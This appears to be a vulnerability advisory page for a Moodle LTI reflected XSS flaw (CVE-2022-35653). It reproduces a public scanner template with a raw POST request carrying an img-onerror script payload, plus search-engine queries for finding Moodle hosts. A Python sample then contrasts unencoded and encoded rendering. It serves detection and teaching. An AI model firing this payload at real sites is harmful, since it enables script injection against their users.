CVE-2022-35653: Moodle LTI module Reflected - Cross-Site Scripting

Date: 2025-08-01 | Affected software: Moodle LTI module | PoC: public

Vulnerability description

A reflected XSS issue was identified in the LTI module of Moodle. The vulnerability exists due to insufficient sanitization of user-supplied data in the LTI module. A remote attacker can trick a victim into following a specially crafted link and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website, which can be used to steal potentially sensitive information, change the appearance of the web page, and perform phishing and drive-by-download attacks.

PoC code [public]

id: CVE-2022-35653

info:
  name: Moodle LTI module Reflected - Cross-Site Scripting
  author: iamnoooob,pdresearch
  severity: medium
  description: |
    A reflected XSS issue was identified in the LTI module of Moodle. The vulnerability exists due to insufficient sanitization of user-supplied data in the LTI module. A remote attacker can trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of vulnerable website to steal potentially sensitive information, change appearance of the web page, can perform phishing and drive-by-download attacks.
  reference:
    - http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-72299
    - https://nvd.nist.gov/vuln/detail/CVE-2022-35653
    - https://bugzilla.redhat.com/show_bug.cgi?id=2106277
    - https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6MOKYVRNFNAODP2XSMGJ5CRDUZCZKAR3/
    - https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MTKUSFPSYFINSQFSOHDQIDVE6FWBEU6V/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-35653
    cwe-id: CWE-79
    epss-score: 0.77252
    epss-percentile: 0.98936
    cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: moodle
    product: moodle
    shodan-query:
      - title:"Moodle"
      - cpe:"cpe:2.3:a:moodle:moodle"
      - http.title:"moodle"
    fofa-query: title="moodle"
    google-query: intitle:"moodle"
  tags: cve,cve2022,moodle,xss

http:
  - raw:
      - |
        POST /mod/lti/auth.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        xxx"><img/src%3d'x'onerror%3dalert('document_domain')>=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img/src='x'onerror=alert('document_domain')>"
          - "moodle-editor"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022061c9ccbc26c55f16396c50e0b162b75979d4bc97586a1abff1405d36b3f29ff7022100eadfa80d6215c760d8a74bf8cbfc3e430b4db6fffb41030806732f2df4a49cb9:922c64590222798bb761d5b6d8e72950
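
The template's request carries the markup in the POST parameter name, and its body matcher looks for that markup reflected without encoding. The following added example (not Moodle's code and not part of the template) uses a hypothetical handler, `render_unsafe`, that writes parameter names and values into hidden form fields, next to `render_safe`, which HTML-encodes them, and applies the template's reflection word to both outputs. The function names and the form layout are assumptions made for illustration.

```python
import html
from urllib.parse import parse_qsl

# Request body and body-matcher word copied from the template on this page.
TEMPLATE_BODY = "xxx\"><img/src%3d'x'onerror%3dalert('document_domain')>=1"
MATCH_WORD = "<img/src='x'onerror=alert('document_domain')>"


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into (name, value) pairs."""
    return parse_qsl(body, keep_blank_values=True)


def render_unsafe(params):
    """Hypothetical handler: writes names and values into HTML with no encoding."""
    fields = "".join(
        f'<input type="hidden" name="{name}" value="{value}">' for name, value in params
    )
    return f'<form method="post">{fields}</form>'


def render_safe(params):
    """Same markup, but every name and value is encoded for an attribute context."""
    fields = "".join(
        '<input type="hidden" name="{}" value="{}">'.format(
            html.escape(name, quote=True), html.escape(value, quote=True)
        )
        for name, value in params
    )
    return f'<form method="post">{fields}</form>'


def reflected_unencoded(response_body):
    """The template's first body word: is the markup present byte for byte?"""
    return MATCH_WORD in response_body


if __name__ == "__main__":
    params = parse_form(TEMPLATE_BODY)
    print("decoded parameter name:", params[0][0])
    print("unsafe render matches:", reflected_unencoded(render_unsafe(params)))
    print("safe render matches:  ", reflected_unencoded(render_safe(params)))
```

Parameter names need the same output encoding as values; a filter applied only to values leaves the case this template exercises untouched.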
